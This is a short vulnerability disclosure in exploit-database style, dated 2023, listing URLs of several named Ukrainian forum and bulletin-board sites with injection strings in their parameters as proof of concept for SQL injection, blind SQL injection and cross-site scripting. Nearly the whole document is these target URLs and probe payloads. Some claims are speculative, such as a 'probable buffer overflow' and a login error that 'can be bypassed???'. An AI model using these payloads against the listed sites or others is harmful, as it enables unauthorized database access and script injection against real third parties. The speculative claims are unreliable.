#Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*)
#Web Site Creator => ???
#Dork => ???
#CMS => ukraina boards and forums
#Vulnz => XSS/Blind SQLi/SQLi
#Date => 28/03/2023

*PoC*
[code]
#1
http://photo.klimenko.kiev.ua/forum.php?c=search&search='-------'&submit=SEARCH <= $_POST SQLi

#2
https://www.stihi.in.ua/forum.php?cat=5'>\>">&page=2 <= XSS

#3
https://astrology.org.ua/thread.php?lang=en>\>">&appSize=0&page=1&v=20230324&thread=2198 <= XSS

#4
#DB type: *[Oracle]*
Unknown column 'ob_ot\'' in 'order clause'
http://board.veles.in.ua/board.php?act=cat&cat_id=1059&sort=-ob_ot <= Blind SQLi

#5
#DB version: *[MySQL >=5]*
http://www.moto.kiev.ua/forum/gallery.php?id=lazer <= Blind SQLi

#6
https://www.hata.dp.ua/board.php?cat=1 <= SQLi
https://www.hata.dp.ua/board.php#board_form <= login MySQL result error, can be bypassed???

#7
http://www.u-technik.com.ua/board.php <= Persistent XSS on page form (probable buffer overflow)
'>">\>
'>">\>
'>">\>
'>">\>
[/code]
*PoC End*